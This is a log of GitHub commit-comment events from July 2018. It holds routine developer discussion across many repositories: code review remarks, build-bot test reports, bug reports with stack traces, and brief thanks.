{"id":"8041992783","type":"CommitCommentEvent","actor":{"login":"Simply007"},"repo":{"name":"Kentico/cloud-sample-app-react"},"payload":{"comment":{"id":29898218,"position":null,"line":null,"path":null,"commit_id":"28549bab115ac482627ddc19d7897859f10ac087","created_at":"2018-07-31T06:25:22Z","updated_at":"2018-07-31T06:25:22Z","author_association":"MEMBER","body":"@sripaulgit - no problem ☺️ \r\nActually I am planning to go on vacation tomorow, that's why I wanted to close the issue, to have it closed before I leave.\r\n\r\nIf you are interested in any other issue, feel free to grob one.\r\nMy colleagues are definitely willing to help you!"}},"created_at":"2018-07-31T06:25:22Z"}
{"id":"8041995019","type":"CommitCommentEvent","actor":{"login":"HeavyTech"},"repo":{"name":"HeavyTech/HackerRank"},"payload":{"comment":{"id":29898227,"position":null,"line":null,"path":null,"commit_id":"95f7cb80d13bcf5a2a91e0af61ca2338b1896e31","created_at":"2018-07-31T06:26:01Z","updated_at":"2018-07-31T06:26:01Z","author_association":"OWNER","body":"Checks if sentence is a Pangram\r\n"}},"created_at":"2018-07-31T06:26:01Z"}
{"id":"8041995181","type":"CommitCommentEvent","actor":{"login":"Beibarsov"},"repo":{"name":"Beibarsov/MiniRPG"},"payload":{"comment":{"id":29898228,"position":null,"line":null,"path":null,"commit_id":"b21e21bb8a1a5521038b0a84c9b55b9968afa008","created_at":"2018-07-31T06:26:04Z","updated_at":"2018-07-31T06:26:04Z","author_association":"OWNER","body":"Просто добавил описание"}},"created_at":"2018-07-31T06:26:04Z"}
{"id":"8041995929","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29898229,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T06:26:16Z","updated_at":"2018-07-31T06:26:16Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2957 of 2957 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T06:26:16Z"}
{"id":"8042004832","type":"CommitCommentEvent","actor":{"login":"Vihru"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29898236,"position":null,"line":null,"path":null,"commit_id":"3bb5866b8e13584dd432fda50d44e366296e6aa0","created_at":"2018-07-31T06:28:43Z","updated_at":"2018-07-31T06:28:43Z","author_association":"NONE","body":"@dogiex mahtavaa!"}},"created_at":"2018-07-31T06:28:43Z"}
{"id":"8042006111","type":"CommitCommentEvent","actor":{"login":"tobozo"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29898241,"position":null,"line":null,"path":null,"commit_id":"589e714094fedef1284da831edd39a5da7d9b4d8","created_at":"2018-07-31T06:29:06Z","updated_at":"2018-07-31T06:29:06Z","author_association":"OWNER","body":"The repo initially had 28 stars, now it's got 42, quite effective.\r\n\r\nDid all the other repos get as many stars or were you using some random assignation to newcomers?\r\n\r\n"}},"created_at":"2018-07-31T06:29:06Z"}
{"id":"8042007698","type":"CommitCommentEvent","actor":{"login":"dmonllao"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29898246,"position":null,"line":null,"path":null,"commit_id":"8c52eb2a152eff8375424447f1232cd147e13e48","created_at":"2018-07-31T06:29:31Z","updated_at":"2018-07-31T06:29:31Z","author_association":"CONTRIBUTOR","body":"Thanks @dvdcastro, I've created https://tracker.moodle.org/browse/MDL-63026 for this issue. I am deleting both comments after 5 mins (to ensure that comment notifications are sent) as we don't keep comments in github."}},"created_at":"2018-07-31T06:29:31Z"}
{"id":"8042008324","type":"CommitCommentEvent","actor":{"login":"SATHYASAGAR"},"repo":{"name":"syedmehralishah/AndroidQuizApp"},"payload":{"comment":{"id":29898250,"position":null,"line":null,"path":null,"commit_id":"8c5218d381fc08fca493564ef9b596d2846fccfe","created_at":"2018-07-31T06:29:42Z","updated_at":"2018-07-31T06:29:42Z","author_association":"NONE","body":"I have not implemented that feature.\n\nOn Mon, Jul 30, 2018, 10:59 PM syedmehralishah <notifications@github.com>\nwrote:\n\n> how can i delete any student in a class after registration from teacher end\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/syedmehralishah/AndroidQuizApp/commit/8c5218d381fc08fca493564ef9b596d2846fccfe#commitcomment-29898039>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADNn-um7hpwc3i49PBKsoB8jVf2B0P1nks5uL_JCgaJpZM4VnpPK>\n> .\n>\n"}},"created_at":"2018-07-31T06:29:42Z"}
{"id":"8042012369","type":"CommitCommentEvent","actor":{"login":"JoeyMcP"},"repo":{"name":"chrisbodger/VeinCam"},"payload":{"comment":{"id":29898260,"position":null,"line":null,"path":null,"commit_id":"116204d0aa6bb48e754fda0cc961f272fd89a272","created_at":"2018-07-31T06:30:47Z","updated_at":"2018-07-31T06:30:47Z","author_association":"COLLABORATOR","body":"wrong date for the month :P"}},"created_at":"2018-07-31T06:30:47Z"}
{"id":"8042017388","type":"CommitCommentEvent","actor":{"login":"freakzo"},"repo":{"name":"etibger/pdf2xlsx"},"payload":{"comment":{"id":29898276,"position":null,"line":null,"path":null,"commit_id":"fdef3dd180bc473184fe59964a2f1d25000442e1","created_at":"2018-07-31T06:32:11Z","updated_at":"2018-07-31T06:32:11Z","author_association":"NONE","body":"How can i go about correcting the error \"AttributeError: 'NoneType' object has no attribute 'xlsx_write'\"\r\n\r\nIt says it's happening on line 123. \r\n\r\nThank you. I'm using python 3.x, is it because of that?"}},"created_at":"2018-07-31T06:32:11Z"}
{"id":"8042017865","type":"CommitCommentEvent","actor":{"login":"mhirabayashi"},"repo":{"name":"mhirabayashi/sylens"},"payload":{"comment":{"id":29898277,"position":null,"line":null,"path":null,"commit_id":"35c71c0e20c08fee1a8a26a4d1f10ed61f13f043","created_at":"2018-07-31T06:32:18Z","updated_at":"2018-07-31T06:32:18Z","author_association":"OWNER","body":"Hi @la0011\r\nAdd compiled binaries for Nuke 11.1, Nuke 11.2 on Windows.\r\nhttps://github.com/mhirabayashi/sylens/commit/b4c08561350cc264ef9d7a27b6f40bcda412531d\r\n"}},"created_at":"2018-07-31T06:32:18Z"}
{"id":"8042028781","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29898292,"position":null,"line":null,"path":null,"commit_id":"023ab8e4a6c65d9c6996880dd42168400b826ffe","created_at":"2018-07-31T06:35:20Z","updated_at":"2018-07-31T06:35:20Z","author_association":"NONE","body":"It looks like there's still a bunch of usages of `s:buffer()`, e.g.\r\n\r\n```\r\nkevin@cdrv:~/.vim/bundle/vim-fugitive [master]\r\n$ ag -Q \"s:buffer()\"\r\nautoload/fugitive.vim\r\n182:  let rev = s:sub(s:buffer().rev(), '^/', '')\r\n185:  elseif s:buffer().type('tree')\r\n2911:      let expanded = s:buffer().rev()\r\n3098:  let rev = s:buffer().rev()\r\n3238:        let ref = s:buffer().rev()\r\n```\r\n\r\nShould those be `fugitive#buffer()` now?\r\n"}},"created_at":"2018-07-31T06:35:20Z"}
{"id":"8042031073","type":"CommitCommentEvent","actor":{"login":"tpope"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29898302,"position":null,"line":null,"path":null,"commit_id":"023ab8e4a6c65d9c6996880dd42168400b826ffe","created_at":"2018-07-31T06:35:57Z","updated_at":"2018-07-31T06:35:57Z","author_association":"OWNER","body":"Yeah I screwed up a rebase, thanks for the heads up."}},"created_at":"2018-07-31T06:35:57Z"}
{"id":"8042032651","type":"CommitCommentEvent","actor":{"login":"novel"},"repo":{"name":"xattr/xattr"},"payload":{"comment":{"id":29898303,"position":null,"line":null,"path":null,"commit_id":"ffeccb067de52fa6296d9063dec5897a2a79ecea","created_at":"2018-07-31T06:36:24Z","updated_at":"2018-07-31T06:36:24Z","author_association":"CONTRIBUTOR","body":"It looks like the release tarball does not include `lib_build.[ch]`:\r\n\r\n```\r\nTraceback (most recent call last):                                                                                                                                                                                 \r\n  File \"<string>\", line 1, in <module>                                                                                                                                                                             \r\n  File \"setup.py\", line 56, in <module>                                                                                                                                                                            \r\n    zip_safe=False,                                                                                                                                                                                                \r\n  File \"/usr/local/lib/python2.7/site-packages/setuptools/__init__.py\", line 131, in setup                                                                                                                         \r\n    return distutils.core.setup(**attrs)                                                                                                                                                                           \r\n  File \"/usr/local/lib/python2.7/distutils/core.py\", line 111, in setup                                                                                                                                            \r\n    _setup_distribution = dist = klass(attrs)                                                                                                                                                                      \r\n  File \"/usr/local/lib/python2.7/site-packages/setuptools/dist.py\", line 370, in __init__                                                                                                                          \r\n    k: v for k, v in attrs.items()                                                                                                                                                                                 \r\n  File \"/usr/local/lib/python2.7/distutils/dist.py\", line 287, in __init__                                                                                                                                         \r\n    self.finalize_options()                                                                                                                                                                                        \r\n  File \"/usr/local/lib/python2.7/site-packages/setuptools/dist.py\", line 529, in finalize_options                                                                                                                  \r\n    ep.load()(self, ep.name, value)                                                                                                                                                                                \r\n  File \"/usr/local/lib/python2.7/site-packages/cffi/setuptools_ext.py\", line 204, in cffi_modules                                                                                                                  \r\n    add_cffi_module(dist, cffi_module)                                                                                                                                                                             \r\n  File \"/usr/local/lib/python2.7/site-packages/cffi/setuptools_ext.py\", line 49, in add_cffi_module                                                                                                                \r\n    execfile(build_file_name, mod_vars)                                                                                                                                                                            \r\n  File \"/usr/local/lib/python2.7/site-packages/cffi/setuptools_ext.py\", line 25, in execfile                                                                                                                       \r\n    exec(code, glob, glob)                                                                                                                                                                                         \r\n  File \"xattr/lib_build.py\", line 7, in <module>                                                                                                                                                                   \r\n    with open(os.path.join(PATH, 'lib_build.h')) as hf:                                                                                                                                                            \r\nIOError: [Errno 2] No such file or directory: 'xattr/lib_build.h'                                                                                                                                                  \r\n*** Error code 1\r\n```\r\n\r\n```\r\n$ ls -1  xattr-0.9.4/xattr                                                                                                                                 \r\n__init__.py                                                                                                                                                                                                        \r\ncompat.py                                                                                                                                                                                                          \r\nlib.py                                                                                                                                                                                                             \r\nlib_build.py                                                                                                                                                                                                       \r\npyxattr_compat.py                                                                                                                                                                                                  \r\ntests                                                                                                                                                                                                              \r\ntool.py            \r\n$\r\n```          \r\n\r\nThese files probably should be included in `MANIFEST.in`?"}},"created_at":"2018-07-31T06:36:24Z"}
{"id":"8042036285","type":"CommitCommentEvent","actor":{"login":"sis-k-o"},"repo":{"name":"sis-k-o/first-pr"},"payload":{"comment":{"id":29898318,"position":null,"line":null,"path":null,"commit_id":"cfcab8c67ce339bea20274d6cd323a63e83651e3","created_at":"2018-07-31T06:37:23Z","updated_at":"2018-07-31T06:37:23Z","author_association":"OWNER","body":"Pull Requestのテスト"}},"created_at":"2018-07-31T06:37:23Z"}
{"id":"8042037392","type":"CommitCommentEvent","actor":{"login":"silenceli"},"repo":{"name":"kahing/goofys"},"payload":{"comment":{"id":29898323,"position":10,"line":151,"path":"internal/dir.go","commit_id":"b2302fdf5af978f1698c0b21f38f01928da25b2f","created_at":"2018-07-31T06:37:41Z","updated_at":"2018-07-31T06:37:41Z","author_association":"NONE","body":"yes\r\n\r\nbb740f10dcac02ddb3a859c4b7c3d9d22849af5a OK\r\nbut b2302fdf5af978f1698c0b21f38f01928da25b2f cause bug\r\n"}},"created_at":"2018-07-31T06:37:41Z"}
{"id":"8042039416","type":"CommitCommentEvent","actor":{"login":"chengqian1"},"repo":{"name":"chengqian1/learngit"},"payload":{"comment":{"id":29898327,"position":1,"line":1,"path":"read.txt","commit_id":"ba29e40367a3cdf510c8a2d0defa602c0aec7303","created_at":"2018-07-31T06:38:13Z","updated_at":"2018-07-31T06:38:13Z","author_association":"OWNER","body":"git"}},"created_at":"2018-07-31T06:38:13Z"}
{"id":"8042039724","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29898328,"position":null,"line":null,"path":null,"commit_id":"ad2c9b2554dbc108e5776e9f6b04682acb3366a5","created_at":"2018-07-31T06:38:18Z","updated_at":"2018-07-31T06:38:18Z","author_association":"OWNER","body":"<img width=\"334\" alt=\"screen shot 2018-07-31 at 13 37 35\" src=\"https://user-images.githubusercontent.com/32533504/43442032-f2eb7002-94c6-11e8-9b7c-40574bec119d.png\">\r\n\r\n<img width=\"352\" alt=\"screen shot 2018-07-31 at 13 37 44\" src=\"https://user-images.githubusercontent.com/32533504/43442036-f5a84018-94c6-11e8-90fa-b55ba604e61b.png\">\r\n"}},"created_at":"2018-07-31T06:38:18Z"}
{"id":"8042042794","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898348,"position":20,"line":429,"path":"classes/output/core_renderer.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:39:07Z","updated_at":"2018-07-31T06:39:07Z","author_association":"MEMBER","body":"Changed."}},"created_at":"2018-07-31T06:39:07Z"}
{"id":"8042044715","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898357,"position":7,"line":184,"path":"lang/en/theme_boost_campus.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:39:37Z","updated_at":"2018-07-31T06:39:37Z","author_association":"MEMBER","body":"Fixed."}},"created_at":"2018-07-31T06:39:37Z"}
{"id":"8042048331","type":"CommitCommentEvent","actor":{"login":"bertolla"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29898365,"position":5,"line":45,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"e7b6204f4cf9243e407dd2f1b18c8e56cc7be414","created_at":"2018-07-31T06:40:35Z","updated_at":"2018-07-31T06:40:35Z","author_association":"CONTRIBUTOR","body":"Authentication is working in the current API, but it's not needed for the Hackathon. I would remove the statement 'Authentication is not yet available in this version of the API'"}},"created_at":"2018-07-31T06:40:35Z"}
{"id":"8042050170","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898368,"position":10,"line":877,"path":"scss/post.scss","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:41:05Z","updated_at":"2018-07-31T06:41:05Z","author_association":"MEMBER","body":"No, because we have this declaration in the header of the scss file and therefore this declaration would be redundant and travis is mocking about this."}},"created_at":"2018-07-31T06:41:05Z"}
{"id":"8042055235","type":"CommitCommentEvent","actor":{"login":"anubhavi25"},"repo":{"name":"anubhavi25/keti"},"payload":{"comment":{"id":29898372,"position":5,"line":95,"path":"acs-integration-tests/src/test/java/org/eclipse/keti/integration/test/AccessControlServiceIT.kt","commit_id":"ba6c977b33e83cafe636f4098129cfea35eaedc7","created_at":"2018-07-31T06:42:25Z","updated_at":"2018-07-31T06:42:25Z","author_association":"OWNER","body":"@irinaepshteyn we don't need to be explicit as long as the return type is covariant.. i've addressed this in my [latest commit](https://github.com/anubhavi25/keti/commit/2a95a486daeafbd36e60692c30f588a03d038ee4?w=1)"}},"created_at":"2018-07-31T06:42:25Z"}
{"id":"8042057392","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898376,"position":12,"line":879,"path":"scss/post.scss","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:42:58Z","updated_at":"2018-07-31T06:42:58Z","author_association":"MEMBER","body":"Because the bullet icons within the modal content are cut on the left side."}},"created_at":"2018-07-31T06:42:58Z"}
{"id":"8042057593","type":"CommitCommentEvent","actor":{"login":"bertolla"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29898377,"position":13,"line":47,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"e7b6204f4cf9243e407dd2f1b18c8e56cc7be414","created_at":"2018-07-31T06:43:02Z","updated_at":"2018-07-31T06:43:02Z","author_association":"CONTRIBUTOR","body":"This description \"The data type of the parameter.\" does not make sense.\r\nI would call this \"the name of the data-type you are searching for\""}},"created_at":"2018-07-31T06:43:02Z"}
{"id":"8042059022","type":"CommitCommentEvent","actor":{"login":"hanxiaomax"},"repo":{"name":"yizheWork/translation-project"},"payload":{"comment":{"id":29898378,"position":null,"line":null,"path":null,"commit_id":"b99f415911681c3982859bfe18799c7b4407b592","created_at":"2018-07-31T06:43:23Z","updated_at":"2018-07-31T06:43:23Z","author_association":"NONE","body":"加油~"}},"created_at":"2018-07-31T06:43:23Z"}
{"id":"8042060957","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898381,"position":15,"line":591,"path":"settings.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:43:52Z","updated_at":"2018-07-31T06:43:52Z","author_association":"MEMBER","body":"Yes, must be a PHPStorm auto correction."}},"created_at":"2018-07-31T06:43:52Z"}
{"id":"8042062740","type":"CommitCommentEvent","actor":{"login":"Kathrin84"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29898383,"position":21,"line":21,"path":"templates/help_icon.mustache","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-31T06:44:21Z","updated_at":"2018-07-31T06:44:21Z","author_association":"MEMBER","body":"Thanks, fixed."}},"created_at":"2018-07-31T06:44:21Z"}
{"id":"8042067851","type":"CommitCommentEvent","actor":{"login":"ahmed-Elfaham"},"repo":{"name":"ahmed-Elfaham/New-project"},"payload":{"comment":{"id":29898396,"position":12,"line":12,"path":"NewProject/NewProject/Program.cs","commit_id":"639ba6a7097a543ef3a597ac07ddeaf279827b94","created_at":"2018-07-31T06:45:40Z","updated_at":"2018-07-31T06:45:40Z","author_association":"OWNER","body":"![offical](https://user-images.githubusercontent.com/39022310/43442380-0c246c6e-949e-11e8-9511-3a24b3a29fa7.jpg)\r\n"}},"created_at":"2018-07-31T06:45:40Z"}
{"id":"8042068003","type":"CommitCommentEvent","actor":{"login":"tpope"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29898397,"position":null,"line":null,"path":null,"commit_id":"023ab8e4a6c65d9c6996880dd42168400b826ffe","created_at":"2018-07-31T06:45:43Z","updated_at":"2018-07-31T06:45:43Z","author_association":"OWNER","body":"Should be good to go now."}},"created_at":"2018-07-31T06:45:43Z"}
{"id":"8042070739","type":"CommitCommentEvent","actor":{"login":"ahmed-Elfaham"},"repo":{"name":"ahmed-Elfaham/New-project"},"payload":{"comment":{"id":29898405,"position":9,"line":9,"path":"NewProject/NewProject/Program.cs","commit_id":"639ba6a7097a543ef3a597ac07ddeaf279827b94","created_at":"2018-07-31T06:46:27Z","updated_at":"2018-07-31T06:46:27Z","author_association":"OWNER","body":"what is that line do"}},"created_at":"2018-07-31T06:46:27Z"}
{"id":"8042072574","type":"CommitCommentEvent","actor":{"login":"ahmed-Elfaham"},"repo":{"name":"ahmed-Elfaham/New-project"},"payload":{"comment":{"id":29898409,"position":9,"line":9,"path":"NewProject/NewProject/Program.cs","commit_id":"639ba6a7097a543ef3a597ac07ddeaf279827b94","created_at":"2018-07-31T06:46:55Z","updated_at":"2018-07-31T06:46:55Z","author_association":"OWNER","body":"do whatever it does "}},"created_at":"2018-07-31T06:46:55Z"}
{"id":"8042074957","type":"CommitCommentEvent","actor":{"login":"ahmed-Elfaham"},"repo":{"name":"ahmed-Elfaham/New-project"},"payload":{"comment":{"id":29898412,"position":10,"line":10,"path":"NewProject/NewProject/Program.cs","commit_id":"639ba6a7097a543ef3a597ac07ddeaf279827b94","created_at":"2018-07-31T06:47:34Z","updated_at":"2018-07-31T06:47:34Z","author_association":"OWNER","body":"comment with your name her  for what"}},"created_at":"2018-07-31T06:47:34Z"}
{"id":"8042076603","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29898413,"position":null,"line":null,"path":null,"commit_id":"0c8bd322e3649dbe35bb31586dac2feb55c26364","created_at":"2018-07-31T06:47:59Z","updated_at":"2018-07-31T06:47:59Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-142](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-142-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T06:47:59Z"}
{"id":"8042077044","type":"CommitCommentEvent","actor":{"login":"nikhil17"},"repo":{"name":"nikhil17/muni"},"payload":{"comment":{"id":29898415,"position":null,"line":null,"path":null,"commit_id":"2d5aaaf629e3c5ec32eb14a90470ccec3db1500c","created_at":"2018-07-31T06:48:06Z","updated_at":"2018-07-31T06:48:06Z","author_association":"OWNER","body":"what is ajv keywords"}},"created_at":"2018-07-31T06:48:06Z"}
{"id":"8042078226","type":"CommitCommentEvent","actor":{"login":"aefederation"},"repo":{"name":"aefederation/aefederation"},"payload":{"comment":{"id":29898416,"position":4,"line":4,"path":"AEF","commit_id":"7fbbd534a9efb98405999a0b1a1fe7b65551b11d","created_at":"2018-07-31T06:48:23Z","updated_at":"2018-07-31T06:48:23Z","author_association":"OWNER","body":"[http://aefederation.org](url)"}},"created_at":"2018-07-31T06:48:23Z"}
{"id":"8042079474","type":"CommitCommentEvent","actor":{"login":"bevanjkay"},"repo":{"name":"bevanjkay/easyappointments"},"payload":{"comment":{"id":29898419,"position":null,"line":null,"path":null,"commit_id":"c7a96d180c5011c73f93c2e42792e505eda7c6d4","created_at":"2018-07-31T06:48:43Z","updated_at":"2018-07-31T06:48:43Z","author_association":"OWNER","body":"After collecting events from Google Calendar, and before adding them to E!A the change checks that the event start and end date aren't NULL. This causes the program to skip any offending events.\r\n\r\nGenerally these events cannot be seen on your Google Calendar and also cannot be deleted."}},"created_at":"2018-07-31T06:48:43Z"}
{"id":"8042086377","type":"CommitCommentEvent","actor":{"login":"ap3h3ad"},"repo":{"name":"OpenIdentityPlatform/OpenDJ"},"payload":{"comment":{"id":29898433,"position":null,"line":null,"path":null,"commit_id":"d8a0693ee610f39d28ccaf139869578b08c307ec","created_at":"2018-07-31T06:50:30Z","updated_at":"2018-07-31T06:50:30Z","author_association":"NONE","body":"Thank you very much, that seemed to do the trick. I don't know how, but the problem is solved."}},"created_at":"2018-07-31T06:50:30Z"}
{"id":"8042086613","type":"CommitCommentEvent","actor":{"login":"Zadezter"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29898434,"position":null,"line":null,"path":null,"commit_id":"8e3043819ebd1696343f7067cebd1e14a6ff74a6","created_at":"2018-07-31T06:50:34Z","updated_at":"2018-07-31T06:50:34Z","author_association":"MEMBER","body":"Nope xD."}},"created_at":"2018-07-31T06:50:34Z"}
{"id":"8042088503","type":"CommitCommentEvent","actor":{"login":"kindunq"},"repo":{"name":"kindunq/reactJS"},"payload":{"comment":{"id":29898436,"position":33,"line":23,"path":"src/App.js","commit_id":"974d0e8b0b5f5c8b50c4bb023e773966ab62af17","created_at":"2018-07-31T06:51:04Z","updated_at":"2018-07-31T06:51:04Z","author_association":"OWNER","body":"가독성이 떨어졌던 2개의 배열을 1개의 오브젝트로 만듦"}},"created_at":"2018-07-31T06:51:04Z"}
{"id":"8042088725","type":"CommitCommentEvent","actor":{"login":"dmolineus"},"repo":{"name":"contao/contao-manager"},"payload":{"comment":{"id":29898437,"position":6,"line":null,"path":"api/Task/Manager/SelfUpdateTask.php","commit_id":"e134c102c5064eb4d86d328c55eae3bb9841c9ae","created_at":"2018-07-31T06:51:08Z","updated_at":"2018-07-31T06:51:08Z","author_association":"NONE","body":"Ok. Sorry for any trouble, just stumpled upon it :)"}},"created_at":"2018-07-31T06:51:08Z"}
{"id":"8042089795","type":"CommitCommentEvent","actor":{"login":"kindunq"},"repo":{"name":"kindunq/reactJS"},"payload":{"comment":{"id":29898441,"position":45,"line":31,"path":"src/App.js","commit_id":"974d0e8b0b5f5c8b50c4bb023e773966ab62af17","created_at":"2018-07-31T06:51:25Z","updated_at":"2018-07-31T06:51:25Z","author_association":"OWNER","body":"array.map를 통해 새로운 배열로 반환한다."}},"created_at":"2018-07-31T06:51:25Z"}
{"id":"8042091933","type":"CommitCommentEvent","actor":{"login":"shivprasaddk"},"repo":{"name":"shivprasaddk/Repo1"},"payload":{"comment":{"id":29898446,"position":null,"line":null,"path":null,"commit_id":"08d3df4f0f3b5e4b689e8648344423e859f9da49","created_at":"2018-07-31T06:51:58Z","updated_at":"2018-07-31T06:51:58Z","author_association":"OWNER","body":"this snippet Yestserday added..."}},"created_at":"2018-07-31T06:51:58Z"}
{"id":"8042095622","type":"CommitCommentEvent","actor":{"login":"denizpiyadesi"},"repo":{"name":"ochubar/Radia"},"payload":{"comment":{"id":29898455,"position":null,"line":null,"path":null,"commit_id":"c4c9e903d67bb4706bfe4befbe709e50580e5c5e","created_at":"2018-07-31T06:52:54Z","updated_at":"2018-07-31T06:52:54Z","author_association":"NONE","body":"Hi, \r\nI couldn't open your RADIA project. Can you help me? \r\nI am an analyzer. I know many tools but noone open it.\r\nThanks,\r\nEnder\r\nendakdogan@gmail.com"}},"created_at":"2018-07-31T06:52:54Z"}
{"id":"8042098531","type":"CommitCommentEvent","actor":{"login":"dpfaffenbauer"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29898460,"position":14,"line":168,"path":"bundles/AdminBundle/Controller/Admin/IndexController.php","commit_id":"5230c341cade43eca24226b221ca7a871f0013eb","created_at":"2018-07-31T06:53:39Z","updated_at":"2018-07-31T06:53:39Z","author_association":"CONTRIBUTOR","body":"```\r\nif ($this->hasParameter('instanceId') {}\r\n```\r\n\r\nwould be faster then try/catch"}},"created_at":"2018-07-31T06:53:39Z"}
{"id":"8042104210","type":"CommitCommentEvent","actor":{"login":"danielarnason"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29898465,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-31T06:55:08Z","updated_at":"2018-07-31T06:55:08Z","author_association":"CONTRIBUTOR","body":"Nej, jeg fik kun et eller andet underligt, som ikke kunne importeres ind i databasen igen. \r\n\r\nVi kan måske bruge det her til noget.\r\n[Geoalchemy2](https://geoalchemy-2.readthedocs.io/en/latest/)"}},"created_at":"2018-07-31T06:55:08Z"}
{"id":"8042109258","type":"CommitCommentEvent","actor":{"login":"triesz"},"repo":{"name":"SeleniumHQ/docker-selenium"},"payload":{"comment":{"id":29898471,"position":null,"line":null,"path":null,"commit_id":"a5005cdf7c84ee12f54e0b5d56cf1fc894be0412","created_at":"2018-07-31T06:56:22Z","updated_at":"2018-07-31T06:56:22Z","author_association":"NONE","body":"hi @diemol ,\r\n\r\nI have started to see some\r\njava.net.SocketException: Unresolved address\r\nwhen upgrading hub and node-chrome from 3.12.0 to 3.13.0\r\n\r\nI wonder if this change can be behind?\r\n\r\nI am using terraform to deploy the grid on AWS with env vars like this:\r\n\r\n`      \"environment\": [\r\n        {\r\n          \"name\": \"HUB_HOST\",\r\n          \"value\": \"${selenium_int_hostname}\"\r\n        },\r\n        {\r\n          \"name\": \"HUB_PORT\",\r\n          \"value\": \"80\"\r\n        },\r\n        {\r\n          \"name\": \"SE_OPTS\",\r\n          \"value\": \"-timeout 65 -browserTimeout 60 -browser browserName=chrome,maxInstances=1,platform=LINUX,applicationName=chrome-${chrome_node_number}\"\r\n        },\r\n        {\r\n          \"name\": \"REMOTE_HOST\",\r\n          \"value\": \"http://${selenium_int_hostname}:${chromeport}\"\r\n        }\r\n      ],\r\n`\r\n"}},"created_at":"2018-07-31T06:56:22Z"}
{"id":"8042110896","type":"CommitCommentEvent","actor":{"login":"bep"},"repo":{"name":"RJacksonm1/hugo"},"payload":{"comment":{"id":29898473,"position":null,"line":null,"path":null,"commit_id":"ddeba37d4c48efdfd5e59351deca64f5482c92bb","created_at":"2018-07-31T06:56:48Z","updated_at":"2018-07-31T06:56:48Z","author_association":"NONE","body":"The code looks correct, but we need a test for it."}},"created_at":"2018-07-31T06:56:48Z"}
